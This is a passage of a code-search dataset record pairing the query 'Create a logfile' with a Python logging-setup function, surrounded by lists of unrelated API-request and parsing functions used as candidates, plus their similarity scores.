g_acct.update(media_type_factory(act_views.GroupView))\n # Categories\n categories = items.setdefault('categories', OrderedDict())\n cat_list = categories.setdefault('categories', OrderedDict())\n cat_list['href'] = reverse(\n 'category-list', request=request, format=format)\n cat_list.update(media_type_factory(cat_views.CategoryList))\n cat_clone = categories.setdefault('category_clone', OrderedDict())\n cat_clone['href'] = reverse(\n 'category-clone', request=request, format=format)\n cat_clone.update(media_type_factory(cat_views.CategoryClone))\n # Invoices\n invoices = items.setdefault('invoices', OrderedDict())\n conditions = invoices.setdefault('conditions', OrderedDict())\n conditions['href'] = reverse(\n 'condition-list', request=request, format=format)\n conditions.update(media_type_factory(inv_views.ConditionList))\n inv_list = invoices.setdefault('items', OrderedDict())\n inv_list['href'] = reverse(\n 'item-list', request=request, format=format)\n inv_list.update(media_type_factory(inv_views.ItemList))\n inv_items = invoices.setdefault('invoices', OrderedDict())\n inv_items['href'] = reverse(\n 'invoice-list', request=request, format=format)\n inv_items.update(media_type_factory(inv_views.InvoiceList))\n inv_item_list = invoices.setdefault('invoice_items', OrderedDict())\n inv_item_list['href'] = reverse(\n 'invoice-item-list', request=request, format=format)\n inv_item_list.update(media_type_factory(inv_views.InvoiceItemList))\n # Maintenance\n locations = items.setdefault('locations', OrderedDict())\n loc_set_list = locations.setdefault('location_set_name', OrderedDict())\n loc_set_list['href'] = reverse(\n 'location-set-name-list', request=request, format=format)\n loc_set_list.update(media_type_factory(loc_views.LocationSetNameList))\n loc_fmt = locations.setdefault('location_format', OrderedDict())\n loc_fmt['href'] = reverse(\n 'location-format-list', request=request, format=format)\n loc_fmt.update(media_type_factory(loc_views.LocationFormatList))\n loc_code = locations.setdefault('location_code', OrderedDict())\n loc_code['href'] = reverse(\n 'location-code-list', request=request, format=format)\n loc_code.update(media_type_factory(loc_views.LocationCodeList))\n loc_clone = locations.setdefault('location_clone', OrderedDict())\n loc_clone['href'] = reverse(\n 'location-clone', request=request, format=format)\n loc_clone.update(media_type_factory(loc_views.LocationClone))\n # Projects\n projects = items.setdefault('projects', OrderedDict())\n proj_type = projects.setdefault('inventory_types', OrderedDict())\n proj_type['href'] = reverse(\n 'inventory-type-list', request=request, format=format)\n proj_type.update(media_type_factory(pro_views.InventoryTypeList))\n proj_list = projects.setdefault('projects', OrderedDict())\n proj_list['href'] = reverse(\n 'project-list', request=request, format=format)\n proj_list.update(media_type_factory(pro_views.ProjectList))\n # Regions\n regions = items.setdefault('regions', OrderedDict())\n countries = regions.setdefault('countries', OrderedDict())\n countries['href'] = reverse(\n 'country-list', request=request, format=format)\n countries.update(media_type_factory(reg_views.CountryList))\n subdivisions = regions.setdefault('subdivisions', OrderedDict())\n subdivisions['href'] = reverse(\n 'subdivision-list', request=request, format=format)\n subdivisions.update(media_type_factory(reg_views.SubdivisionList))\n currencies = regions.setdefault('currencies', OrderedDict())\n currencies['href'] = reverse(\n 'currency-list', request=request, format=format)\n currencies.update(media_type_factory(reg_views.CurrencyList))\n languages = regions.setdefault('languages', OrderedDict())\n languages['href'] = reverse(\n 'language-list', request=request, format=format)\n languages.update(media_type_factory(reg_views.LanguageList))\n timezones = regions.setdefault('timezones', OrderedDict())\n timezones['href'] = reverse(\n 'timezone-list', request=request, format=format)\n timezones.update(media_type_factory(reg_views.TimeZoneList))\n # Suppliers\n suppliers = items.setdefault('suppliers', OrderedDict())\n supp = suppliers.setdefault('suppliers', OrderedDict())\n supp['href'] = reverse(\n 'supplier-list', request=request, format=format)\n supp.update(media_type_factory(sup_views.SupplierList))\n return Response(buff)", "def test_api_base(self):\n # load api base\n r = requests.get('{server}/api/0.1/'.format(\n server=self.get_server_url()))\n j = r.json()\n self.assertIn('gages', j)\n self.assertIn('sections', j)\n self.assertIn('regions', j)\n self.assertIn('rivers', j)\n self.assertIn('sensors', j)\n self.assertIn('samples', j)", "def __exec_request(self, URL) -> Any:\n headers = {\n \"X-ELS-APIKey\": self.config['apikey'],\n \"Accept\": 'application/json'\n }\n\n request = requests.get(\n URL,\n headers=headers\n )\n self._status_code = request.status_code\n\n if request.status_code == 200:\n return json.loads(request.text, strict=False)\n else:\n return \"failed\"", "def _perform_request(self, req):\n \n res = req.content\n x = json.loads(res, object_hook=lambda d: namedtuple('X', d.keys())(*d.values()))\n return x", "def handle(self, content):\n # Check the API request\n serializer = ApiRequestSerializer(data=content)\n if not serializer.is_valid():\n return self.consumer.send_to_client(\n {\"topic\": \"api\", \"type\": \"error\", \"message\": \"invalid-request\"}\n )\n\n # Make request\n method = serializer.validated_data[\"method\"]\n url = serializer.validated_data[\"url\"]\n payload = serializer.validated_data.get(\"payload\", None)\n logger.info(\"API {}:{}:{}\".format(method, url, payload))\n\n response = getattr(self.client, method)(url, data=payload, follow=True)\n\n # Return to client\n # API response\n to_client = {\n \"topic\": \"api\",\n \"type\": \"response\",\n \"status_code\": response.status_code,\n }\n if response.get(\"Content-Type\") == \"application/json\":\n to_client[\"content\"] = response.json()\n else:\n to_client[\"content\"] = content\n\n # Original request params\n to_client.update({\"method\": method, \"url\": url})\n if payload is not None:\n to_client[\"payload\"] = payload\n\n self.consumer.send_to_client(to_client)", "def request(host=API_HOST, path=SEARCH_PATH, api_key=API_KEY, url_params=params):\n url_params = url_params or {}\n url = '{0}{1}'.format(host, quote(path.encode('utf8')))\n headers = {\n 'Authorization': 'Bearer %s' % api_key,\n }\n\n response = requests.request('GET', url, headers=headers, params=url_params)\n\n return response.json()", "def parse_api(baseurl):\n\t# Make 4 api calls in total\n\tfor call in range(1, 5):\n\t\t# Write an error to file if no response after 4 attempts\n\t\tif call == 4:\n\t\t\twith open('errors.txt', 'a') as file:\n\t\t\t\tfile.write(\"Server is not responding after 4 attempts. Time: {}\\n\".format(\n\t\t\t\t\tdt_to_string(datetime.datetime.now())\n\t\t\t\t))\n\t\t\treturn False\n\t\ttry:\n\t\t\t# download data from api\n\t\t\tresult = urllib.request.urlopen(baseurl).read()\n\t\t\treturn result\n\t\texcept urllib.error.URLError:\n\t\t\t# wait 10 minutes if server is not responding and make another call\n\t\t\tprint(\"Seems like server is not responding. Will try again in 10 minutes...\")\n\t\t\ttime.sleep(660)", "def home():\n return(\n f\"Available Routes: <br/>\"\n\n f\"For Precipitation: /api/v1.0/precipitation<br/>\"\n f\"Returns Jsonify dictionary of dates and Precepitation<br/><br/>\"\n\n f\"For list of Stations: /api/v1.0/stations<br/>\"\n f\"Returns Jasonify list of stations <br/><br/>\"\n\n f\"For last year temperatures: /api/v1.0/tobs<br/>\"\n f\"Returns Jsonify dictionary of Temperature Observations for last year<br/><br/>\"\n\n f\"Temperature result from the date in format (yyyy-mm-dd): /api/v1.0/yyyy-mm-dd<br/>\"\n f\"Returns an Average, Max, and Min temperatures from given start date of dataset<br/><br/>\"\n\n f\"Temperature result from start date to end date in format (yyyy-mm-dd): /api/v1.0/yyyy-mm-dd/yyyy-mm-dd<br/>\"\n f\"Returns an Average, Max, and Min temperatures for a given date range\"\n\n )", "def _http_get(self, url, params={}):\n if not self.token:\n self.get_token()\n headers = {'Authorization': self.token, 'Accept': 'application/json; indent=4'}\n url = self.server + '/api2' + url\n try:\n r = requests.get(url=url, headers=headers, params=params)\n except requests.exceptions.RequestException as e:\n return check_failed(e)\n # raise ClientHttpError(None, e)\n if r.status_code != 200:\n return check_failed(r.status_code)\n # return ClientHttpError(r.status_code, json.loads(r.text)['error_msg'])\n try:\n data = json.loads(r.text)\n except:\n data = r.text\n # TODO: check data\n return data", "def base_request(url_path):\n response = requests.get(settings.URL_API + url_path)\n if response.status_code != 200:\n return response\n else:\n return response.json()", "def _process_url(self, url):\n response = requests.get(url, timeout=self.TIMEOUT)\n try:\n ret = response.json()\n except JSONDecodeError:\n self.log.exception(\"JSONDecodeError, response: %r, response.text: %r\", response, response.text)\n ret = {\"error\": \"The api broke.\"}\n return ret", "def __init__(self, request: object) -> None:\n super().__init__({}, request, URL, Api)", "def test_get_parameter_processing(self):\n self._register_uri(httpretty.GET)\n photo = trovebox.objects.photo.Photo(None, {\"id\": \"photo_id\"})\n album = trovebox.objects.album.Album(None, {\"id\": \"album_id\"})\n tag = trovebox.objects.tag.Tag(None, {\"id\": \"tag_id\"})\n self.client.get(self.test_endpoint,\n photo=photo, album=album, tag=tag,\n list_=[photo, album, tag],\n list2=[\"1\", False, 3],\n unicode_list=[\"1\", \"2\", \"\\xfcmlaut\"],\n boolean=True,\n unicode_=\"\\xfcmlaut\")\n params = self._last_request().querystring\n self.assertEqual(params[\"photo\"], [\"photo_id\"])\n self.assertEqual(params[\"album\"], [\"album_id\"])\n self.assertEqual(params[\"tag\"], [\"tag_id\"])\n self.assertEqual(params[\"list_\"], [\"photo_id,album_id,tag_id\"])\n self.assertEqual(params[\"list2\"], [\"1,0,3\"])\n self.assertIn(params[\"unicode_list\"], [[\"1,2,\\xc3\\xbcmlaut\"], [\"1,2,\\xfcmlaut\"]])\n self.assertEqual(params[\"boolean\"], [\"1\"])\n self.assertIn(params[\"unicode_\"], [[\"\\xc3\\xbcmlaut\"], [\"\\xfcmlaut\"]])", "def test_simple4(self):\n api = self.load_api_description('simple4.json')\n self.assertEqual(api.name, 'Starbucks')\n self.assertEqual(len(api.resources), 2)\n\n resource = api.resources[1]\n self.assertEqual(resource.name, 'AllOrders')\n self.assertEqual(resource.path, '/')\n self.assertEqual(len(resource.operations), 2)\n\n operation = resource.operations[0]\n self.assertEqual(operation.method, 'GET')\n self.assertIsNone(operation.input)\n output = operation.output\n self.assertEqual(output.status, 200)\n self.assertEqual(output.type.type.get_reference_name(), 'list(Order)')\n self.assertEqual(len(output.contentType), 1)\n self.assertEqual(output.contentType[0], 'json')\n\n operation = resource.operations[1]\n self.assertEqual(operation.method, 'POST')\n input = operation.input\n self.assertEqual(input.type.type.get_reference_name(), 'OrderRequest')\n self.assertEqual(input.contentType[0], 'json')\n output = operation.output\n self.assertEqual(output.status, 201)\n self.assertEqual(output.type.type.get_reference_name(), 'Order')\n self.assertEqual(len(output.contentType), 1)\n self.assertEqual(output.contentType[0], 'json')\n self.assertEqual(len(output.headers), 1)\n header = output.headers[0]\n self.assertEqual(header.name, 'Location')\n self.assertEqual(header.type.type.get_reference_name(), 'href')\n self.assertEqual(header.type.ref, 'Order')\n\n self.assertEqual(len(api.base), 1)\n self.assertEqual(api.base[0], 'http://test.com/starbucks')\n\n self.assertEqual(len(api.data_types), 2)\n self.assertEqual(len(api.data_types[0].fields), 5)\n self.assertEqual(len(api.data_types[1].fields), 2)\n self.assertFalse(api.data_types[1].fields[0].optional)\n self.assertTrue(api.data_types[1].fields[1].optional)\n\n resource = api.resources[0]\n self.assertEqual(len(resource.input_bindings), 1)\n self.assertEqual(resource.input_bindings[0].id, 'orderIdBinding')\n self.assertEqual(len(resource.operations), 2)\n self.assertEqual(resource.operations[0].input.params[0].binding, 'orderIdBinding')\n self.assertEqual(resource.operations[1].input.params[0].binding, 'orderIdBinding')", "def rest(method, endpoint, access_token, data={}, id=None):\n headers = {\n 'Authorization': f\"Bearer {access_token}\",\n 'Accept': 'application/json',\n 'Content-Type': 'application/json'\n }\n base_url = \"https://api.intercom.io/\"\n\n # for creating and updating a companies api using POST method only\n if endpoint in ['contacts', 'companies', 'events', 'tags'] and method == 'POST':\n url = f\"{base_url}{endpoint}\"\n elif endpoint == 'add_tags' and method == \"POST\":\n url = f\"{base_url}contacts/{id}/tags\"\n elif (endpoint == 'contacts') and method == 'POST':\n url = f\"{base_url}{endpoint}/{id}\"\n elif endpoint == 'contact_email' and method == 'POST':\n url = f\"{base_url}contacts/search\"\n elif endpoint == 'notes' and method == 'POST':\n url = f\"{base_url}contacts/{id}/notes\"\n elif endpoint == 'contacts' and method == 'PUT':\n url = f\"{base_url}{endpoint}/{id}\"\n elif endpoint == 'tags' and method == 'DELETE':\n url = f\"{base_url}contacts/{id[0]}/tags/{id[1]}\"\n elif endpoint == 'contacts' and method == 'GET':\n url = f\"{base_url}{endpoint}/{id}\"\n elif endpoint == 'companies' and method == 'GET':\n url = f\"{base_url}{endpoint}?company_id={id}\"\n elif endpoint == 'admin' and method == 'GET':\n url = f'{base_url}admins'\n\n response = requests.request(\n method, url, headers=headers, data=json.dumps(data))\n return response", "def test_simple2(self):\n api = self.load_api_description('simple2.json')\n self.assertEqual(api.name, 'Starbucks')\n self.assertEqual(len(api.resources), 1)\n\n resource = api.resources[0]\n self.assertEqual(resource.name, 'AllOrders')\n self.assertEqual(resource.path, '/')\n self.assertEqual(len(resource.operations), 2)\n\n operation = resource.operations[0]\n self.assertEqual(operation.method, 'GET')\n self.assertIsNone(operation.input)\n output = operation.output\n self.assertEqual(output.status, 200)\n self.assertEqual(output.type.type.get_reference_name(), 'list(Order)')\n self.assertEqual(len(output.contentType), 1)\n self.assertEqual(output.contentType[0], 'json')\n\n operation = resource.operations[1]\n self.assertEqual(operation.method, 'POST')\n input = operation.input\n self.assertEqual(input.type.type.get_reference_name(), 'OrderRequest')\n self.assertEqual(input.contentType[0], 'json')\n output = operation.output\n self.assertEqual(output.status, 201)\n self.assertEqual(output.type.type.get_reference_name(), 'Order')\n self.assertEqual(len(output.contentType), 1)\n self.assertEqual(output.contentType[0], 'json')\n\n self.assertEqual(len(api.base), 1)\n self.assertEqual(api.base[0], 'http://test.com/starbucks')\n\n self.assertEqual(len(api.data_types), 2)\n self.assertEqual(len(api.data_types[0].fields), 5)\n self.assertEqual(len(api.data_types[1].fields), 2)\n self.assertFalse(api.data_types[1].fields[0].optional)\n self.assertTrue(api.data_types[1].fields[1].optional)", "def __init__( httpconn, method, uri, uriparts, version, headers ):", "def pull(self, url, params=None, data=None, auth=None, method=\"GET\"):\n try:\n __method_name = inspect.currentframe().f_code.co_name\n if method == \"POST\":\n res = self.session.post(\n url=url,\n auth=auth,\n params=params,\n data=data,\n timeout=consts.API_TIMEOUT,\n )\n else:\n res = self.session.get(\n url=url,\n auth=auth,\n params=params,\n data=data,\n timeout=consts.API_TIMEOUT,\n )\n res.raise_for_status()\n if res and res.status_code in [200, 201]:\n self.applogger.debug(\n '{}(method={}) : {} : API call: Response received successfully. url=\"{}\" params=\"{}\"'.format(\n consts.LOGS_STARTS_WITH,\n __method_name,\n self.function_name,\n url,\n params,\n )\n )\n return res.json()\n else:\n self.applogger.error(\n \"{}(method={}) : {} : API call: Unknown status code or empty \"\n 'response: url=\"{}\" status_code=\"{}\" response=\"{}\"'.format(\n consts.LOGS_STARTS_WITH,\n __method_name,\n self.function_name,\n url,\n res.status_code,\n res.text,\n )\n )\n raise Exception(\"Received unknown status code or empty response.\")\n except requests.exceptions.HTTPError as ex:\n if res.status_code == 404:\n self.applogger.debug(\n '{}(method={}) : {} : API call: Got {} Status Code : url=\"{}\"'\n ' response=\"{}\"'.format(\n consts.LOGS_STARTS_WITH,\n __method_name,\n self.function_name,\n url,\n ex.response.status_code,\n ex.response.text,\n )\n )\n return {}\n else:\n self.applogger.error(\n '{}(method={}) : {} : API call: Unsuccessful response: url=\"{}\" status_code=\"{}\"'\n ' response=\"{}\"'.format(\n consts.LOGS_STARTS_WITH,\n __method_name,\n self.function_name,\n url,\n ex.response.status_code,\n ex.response.text,\n )\n )\n raise Exception(\"HTTP Error Occurred while getting response from api.\")\n except Exception as ex:\n self.applogger.error(\n '{}(method={}) : {} : API call: Unexpected error while API call url=\"{}\" error=\"{}\"'.format(\n consts.LOGS_STARTS_WITH,\n __method_name,\n self.function_name,\n url,\n str(ex),\n )\n )\n raise Exception(\"Error Occurred while getting response from api.\")", "def api(self) -> str:", "def _get(self, endpoint):\n res = self._request(\"get\", endpoint)\n if not res.content:\n return {}\n try:\n res = res.json()\n except ValueError:\n raise ValueError(\"Cannot parse {} as JSON\".format(res))\n if \"error\" in res:\n raise AirthingsError(res[\"error\"])\n return res", "def _request(self, url, **kwargs):\n headers = {'PRIVATE-TOKEN': self.token}\n response = make_request(self.base_url + url, headers=headers, **kwargs)\n logging.info('Requested: {0}'.format(url))\n logging.info('Method: {0}'.format(kwargs.get('method', 'GET')))\n logging.info(response.content)\n return json.loads(response.content)", "def customRequestParser(data):\n if data:\n if(len(data) > 30):\n return \"REQUEST EXCEED MAX ALLOWED\"\n\n requestArray = data.split()\n if(len(requestArray[0]) != 4 or not requestArray[0].isdigit()):\n return \"BAD REQUEST 4 DIGIT MISSING\"\n \n return reverseResponse(data)\n else:\n return \"BAD REQUEST\"", "def _api_request(*args, **kwargs):\n response = requests.request(*args, **kwargs)\n return APIResponse(response)", "def json_api_call(url):\n response = requests.get(url)\n return response.json()", "def _request(self, endpoint: str = \"/api/\", params: object = {}) -> dict:\n ret: dict = {}\n try:\n if not self.api_key:\n ret[\"error\"] = \"API key is empty\"\n raise APIError(ret['error'])\n\n r = requests.get(f\"{self.apibase}{endpoint}\",\n params=params,\n headers=self.headers,\n verify=self.verify_ssl)\n response_data = orjson.loads(r.text)\n except orjson.JSONDecodeError:\n ret[\"error\"] = \"Failed to parse response data to JSON\"\n if self.debug:\n ret[\"error\"] += \"\\nDescription: \" + r.reason\n ret[\"error\"] += \"\\nData: \" + r.text\n except requests.HTTPError:\n ret[\"error\"] = f\"{r.status_code}: {r.reason}\"\n if self.debug:\n ret[\"error\"] += \"\\nDescription: \" + r.reason\n ret[\"error\"] += \"\\nData: \" + r.text\n\n if ret.get('error', None):\n raise APIError(ret['error'])\n check_status_code(request=r, debug=self.debug, ret=ret)\n\n ret = response_data\n return ret", "def _make_request(self, additional_params: dict, new_base_url: str = None) -> list:\n if new_base_url:\n url: str = new_base_url\n params: dict = additional_params\n else:\n url: str = self.base_url\n params: dict = dict(self.base_params, **additional_params)\n response: requests.Response = self.session.get(url, params=params)\n if response.status_code == 200:\n try:\n response_text = json.loads(response.text)\n except ValueError:\n response_text = response.text\n else:\n raise ALHTTPExceptionFromResponse(response)\n\n # sometimes we get a pure dictionary back, let's wrap it in a list for consistency\n if isinstance(response_text, dict):\n response_text = [response_text]\n return response_text", "def api_root(request, format=None):\n return Response(\n {\n 'users': reverse('cloud:user-list', request=request),\n 'configuration': reverse('cloud:configuration-detail', request=request),\n 'statistics': reverse('cloud:statistics-detail', request=request),\n 'state': reverse('cloud:state-detail', request=request)\n }\n )", "def test_trucks_api(self):\n resp = self.app.get('/trucks')\n self.assertEqual(resp.status_code, 200)\n\n # ensure proper JSON is returned\n data = json.loads(resp.data)\n assert 'resp' in data\n for item in data['resp']:\n # address is not actually required\n assert 'name' in item\n assert 'fooditems' in item\n assert 'latitude' in item\n assert 'longitude' in item\n assert 'schedule' in item", "def request(query):", "def _make_request(self, url: str, parameters: dict = None,\n method: str = 'GET', *args, **kwargs):\n response = requests.request(\n method=method,\n url=build_url(\n self.BASE_API_URL, url, parameters\n ),\n headers={\n 'Authorization': 'Bearer {}'.format(self._access_token)\n }, **kwargs\n )\n if response.ok:\n return response.json()\n raise MondoApiException(response.json()['message'])", "def parse_start_url(self, response):\n self.parse_obj(response)", "def _getFromBody(self, request):\n assert self.error is None\n assert isinstance(request.body, str)\n try:\n json_rpc_request_dict = loads(request.body)\n if isinstance(json_rpc_request_dict, list):\n self.list = json_rpc_request_dict\n return\n except ValueError, e:\n error(\"failed to parse JSON object in the body\")\n self.error = JsonRpcError.PARSE_ERROR\n return\n for k, v in json_rpc_request_dict.iteritems():\n if k == \"jsonrpc\":\n self.jsonrpc = v\n if k == \"method\":\n self.method = v\n if k == \"id\":\n self.id = v\n if k == \"params\":\n self.params = v\n self.dict[k] = v", "def __parse(self, ch, method, properties, body: bytes):\n input_msg = body.decode()\n request = json.loads(input_msg)\n answer_msg = {}\n err_code = 0\n err_msg = \"\"\n req_id = request.get(\"id\")\n try:\n tag = request[\"tag\"]\n if tag == \"who_are_you\":\n answer_msg = self.whoami()\n elif tag == \"task\":\n answer_msg = self.generate()\n else:\n err_code = -2\n err_msg = \"Unexpected param\"\n except KeyError:\n err_code = -1\n err_msg = \"Error request parsing\"\n finally:\n self.__answer(json.dumps({\"req_id\": req_id,\n \"data\": answer_msg,\n \"err\": {\"code\": err_code,\n \"msg\": err_msg}}))", "def __init__(self):\n self._url = \"\"\n self._verb = VERBS.GET\n self._params = {}\n self._data = {}", "def parse_request(json_data: str) -> Request:\n logger.debug('Type: {}'.format(type(json_data)))\n data = json.loads(json_data)\n\n return Request(\n data[\"text\"],\n PatternCategory(data[\"previous_pattern\"]\n ) if \"previous_pattern\" in data else None,\n data[\"mood\"],\n data[\"affection\"],\n Gender(data[\"bot_gender\"]),\n data[\"bot_name\"],\n date.fromtimestamp(data[\"bot_birthdate\"]),\n data[\"bot_favorite_color\"],\n data[\"father_name\"],\n data[\"father_age\"],\n data[\"mother_name\"],\n data[\"mother_age\"],\n )", "def _get_request_parser(self, operation):\n\n wpsrequest = self\n\n def parse_get_getcapabilities(http_request):\n \"\"\"Parse GET GetCapabilities request\n \"\"\"\n\n acceptedversions = _get_get_param(http_request, 'acceptversions')\n wpsrequest.check_accepted_versions(acceptedversions)\n\n def parse_get_describeprocess(http_request):\n \"\"\"Parse GET DescribeProcess request\n \"\"\"\n version = _get_get_param(http_request, 'version')\n wpsrequest.check_and_set_version(version)\n\n language = _get_get_param(http_request, 'language')\n wpsrequest.check_and_set_language(language)\n\n wpsrequest.identifiers = _get_get_param(\n http_request, 'identifier', aslist=True)\n\n def parse_get_execute(http_request):\n \"\"\"Parse GET Execute request\n \"\"\"\n version = _get_get_param(http_request, 'version')\n wpsrequest.check_and_set_version(version)\n\n language = _get_get_param(http_request, 'language')\n wpsrequest.check_and_set_language(language)\n\n wpsrequest.identifier = _get_get_param(http_request, 'identifier')\n wpsrequest.store_execute = _get_get_param(\n http_request, 'storeExecuteResponse', 'false')\n wpsrequest.status = _get_get_param(http_request, 'status', 'false')\n wpsrequest.lineage = _get_get_param(\n http_request, 'lineage', 'false')\n wpsrequest.inputs = get_data_from_kvp(\n _get_get_param(http_request, 'DataInputs'), 'DataInputs')\n wpsrequest.outputs = {}\n\n # take responseDocument preferably\n resp_outputs = get_data_from_kvp(\n _get_get_param(http_request, 'ResponseDocument'))\n raw_outputs = get_data_from_kvp(\n _get_get_param(http_request, 'RawDataOutput'))\n wpsrequest.raw = False\n if resp_outputs:\n wpsrequest.outputs = resp_outputs\n elif raw_outputs:\n wpsrequest.outputs = raw_outputs\n wpsrequest.raw = True\n # executeResponse XML will not be stored and no updating of\n # status\n wpsrequest.store_execute = 'false'\n wpsrequest.status = 'false'\n\n if not operation:\n raise MissingParameterValue('Missing request value', 'request')\n else:\n self.operation = operation.lower()\n\n if self.operation == 'getcapabilities':\n return parse_get_getcapabilities\n elif self.operation == 'describeprocess':\n return parse_get_describeprocess\n elif self.operation == 'execute':\n return parse_get_execute\n else:\n raise OperationNotSupported(\n 'Unknown request %r' % self.operation, operation)", "def parse_response(self, response, case):\n request = response.request\n parsed = {\n 'request': {\n 'method': request.method,\n 'url': request.url,\n 'body': request.body,\n },\n 'response': {\n 'headers': OrderedDict(),\n 'status_code': response.status_code,\n 'reason': response.reason,\n }\n }\n\n # Re-assemble request line\n url_parts = urlparse(request.url)\n parsed['request']['request_line'] = '%s %s%s%s HTTP/1.1' % (\n request.method, url_parts.path, '?' if url_parts.query else '',\n url_parts.query)\n\n # Process request headers\n if self.mode == 'display':\n hostname = url_parts.hostname\n else:\n hostname = self.doc_hostname\n parsed['request']['headers'] = OrderedDict((('Host', hostname),))\n for header in sorted([h.title() for h in request.headers]):\n raw_value = request.headers[header]\n value = self.parse_header(header, raw_value, 'request')\n if value:\n parsed['request']['headers'][header.title()] = value\n\n # Re-assemble response line\n parsed['response']['response_line'] = 'HTTP/1.1 %s %s' % (\n response.status_code, response.reason)\n\n # Process response headers\n for header in sorted([h.title() for h in response.headers]):\n raw_value = response.headers[header]\n value = self.parse_header(header, raw_value, 'response')\n if value:\n fixed_header = header.title().replace('Www', 'WWW')\n parsed['response']['headers'][fixed_header] = value\n\n # Process response body\n response.encoding = 'utf-8'\n body = response.text\n if self.standardize:\n body = body.replace(api, self.doc_base_url)\n for key, value in case.get('standardize', {}).items():\n assert key in ('created', 'modified', 'date')\n pattern = r\"\"\"(?x)(?s) # Be verbose, . include newlines\n \"%s\":\\s\" # Key and quote\n \\d{4}-\\d{2}-\\d{2} # Date\n T\\d{2}:\\d{2}:\\d{2} # Time\n \\.\\d{0,6}Z # Microseconds and UTC timezone\n \", # End quote and comma\n \"\"\" % key\n replace = '\"%s\": \"%s\",' % (key, value)\n body = re.sub(pattern, replace, body)\n parsed['response']['body'] = body\n\n return parsed", "def request(self, methods, params, format='json'):\n params['api_key'] = self.api_key\n params['expire'] = int(time.time()) + 600 # Grant this request 10 minutes.\n params['format'] = format\n if 'sig' in params: del params['sig']\n params['sig'] = self.hash_args(params)\n\n request_url = '/'.join([self.ENDPOINT, str(self.VERSION)] + methods) + '/?' + self.unicode_urlencode(params)\n #print request_url\n request = urllib.urlopen(request_url)\n data = request.read()\n\n return json.loads(data)", "def _do_request(self, url, method='GET', body=None):\n response, content = self.request(url, method=method, body=body, headers=self.headers)\n if int(response['status']) != 200:\n raise GPAPIError(response['status'], 'ERROR IN REQUEST')\n json = simplejson.loads(content)\n return json", "def parse_xmlrpc_request(request):\n if request.content_length > (1 << 23):\n # protect from DOS (> 8MB body)\n raise ValueError('Body too large (%s bytes)' % request.content_length)\n params, method = xmlrpclib.loads(request.body)\n return params, method", "def fill_from_api_response(self, api_response):\n pass", "def get_api_response_data(base_url: str, **kwargs: Any) -> Any:\n query = urlencode(kwargs)\n url = f'{base_url}?{query}'\n\n response = requests.get(url)\n response.raise_for_status()\n\n return response.json()", "def parser(self, q, casing=None):\r\n params = base.get_params(None, locals())\r\n url = '{0}/{1}'.format(self.get_url(), 'parser')\r\n\r\n request = http.Request('GET', url, params)\r\n\r\n return request, parsers.parse_json" ]
[ "0.6661732", "0.6361013", "0.6351881", "0.63334227", "0.6265376", "0.62463653", "0.61369115", "0.61359483", "0.6097976", "0.6052464", "0.6047303", "0.60433483", "0.59891516", "0.58926797", "0.5875995", "0.5862154", "0.5862154", "0.5862154", "0.5862154", "0.581381", "0.579058", "0.57867575", "0.5781066", "0.5770481", "0.5764894", "0.57387334", "0.5713837", "0.5712028", "0.56802887", "0.56727254", "0.5671666", "0.5667968", "0.5657201", "0.5653606", "0.5648943", "0.56296396", "0.55895144", "0.55869085", "0.55866086", "0.55849415", "0.5584484", "0.55817413", "0.5573634", "0.5557172", "0.554947", "0.5543188", "0.5536592", "0.5529045", "0.5523614", "0.5509856", "0.5508179", "0.5498941", "0.54863876", "0.5481961", "0.54771537", "0.5458355", "0.54507554", "0.5450603", "0.5442747", "0.5429266", "0.542524", "0.54250777", "0.54155344", "0.54145175", "0.5413322", "0.5408159", "0.5405341", "0.54043585", "0.5403654", "0.5392508", "0.538629", "0.5381379", "0.53766054", "0.53724277", "0.5367579", "0.5366489", "0.5363652", "0.53581834", "0.5355706", "0.5355598", "0.5348449", "0.53454864", "0.53435344", "0.53424", "0.5342093", "0.53350824", "0.5333573", "0.53331935", "0.53320706", "0.53278184", "0.5327772", "0.5327164", "0.53257775", "0.53221136", "0.5321435", "0.53199106", "0.53034055", "0.5303177", "0.5300524", "0.5293814", "0.5291379" ]
0.0
-1
Create a logfile that the rest of the script can write to.
def log_start(): scriptDir = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) scriptName = os.path.splitext(os.path.basename(__file__))[0] log = logging.getLogger('cam_server') hdlr = logging.FileHandler(scriptDir+'/logs/'+scriptName+'.log') formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s') hdlr.setFormatter(formatter) log.addHandler(hdlr) log.setLevel(logging.INFO) return log
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _create_logfile(self):\r\n if not self.console_redirect:\r\n return None\r\n\r\n # PCU_logs.robot need a timestamp for console logs as can be run several times\r\n if self.name == self.log_test.replace('.robot', ''):\r\n return open('{0}\\{1}_console_log_{2}'.format(\r\n self.output_dir_path, self.name, datetime.now().strftime(\"%m%d%H%M\")), \"w+\")\r\n else:\r\n return open('{0}\\{1}_console_log'.format(self.output_dir_path, self.name), \"w+\")", "def _createLogFile(LogFile,date,LocalPath,ShowTagsResult):\n try:\n LOG = open(LogFile,\"w\")\n if _verbose:\n print(\"Writing Production Host, Location, Release and Tags information in %s\" % LogFile) \n LOG.write(\"These performance tests were executed on host %s and published on %s\" % (HOST,date))\n LOG.write(\"They were run in %s\" % LocalPath)\n LOG.write(\"Results of showtags -r in the local release:\\n%s\" % ShowTagsResult)\n LOG.close()\n except IOError as detail:\n print(\"WARNING: Can't create log file\") \n print(detail)", "def _createlog(self):\n\t\tif self.toemail and self.fromemail and self.smtphost:\n\t\t\t# Use the email logger as the first logger, so that when sending the email (in :meth:`EmailLogger.close`) fails, it will still be logged to the log file/stdout/stderr\n\t\t\tself._loggers.append(EmailLogger(self))\n\t\tif self.log2stderr:\n\t\t\tself._loggers.append(StreamLogger(self, sys.stderr, self._formatlogline))\n\t\tif self.log2stdout:\n\t\t\tself._loggers.append(StreamLogger(self, sys.stdout, self._formatlogline))\n\t\tif self.log2file:\n\t\t\t# Create the log file\n\t\t\tlogfilename = ul4c.Template(self.logfilename, \"logfilename\").renders(job=self)\n\t\t\tlogfilename = url.File(logfilename).abs()\n\t\t\tself.logfileurl = str(url.Ssh(misc.sysinfo.user_name, misc.sysinfo.host_fqdn or misc.sysinfo.host_name, logfilename.local()))\n\t\t\tskipurls = [logfilename]\n\t\t\tlogfile = logfilename.open(mode=\"w\", encoding=self.encoding, errors=self.errors)\n\t\t\tif self.loglinkname is not None:\n\t\t\t\t# Create the log link\n\t\t\t\tloglinkname = ul4c.Template(self.loglinkname, \"loglinkname\").renders(job=self)\n\t\t\t\tloglinkname = 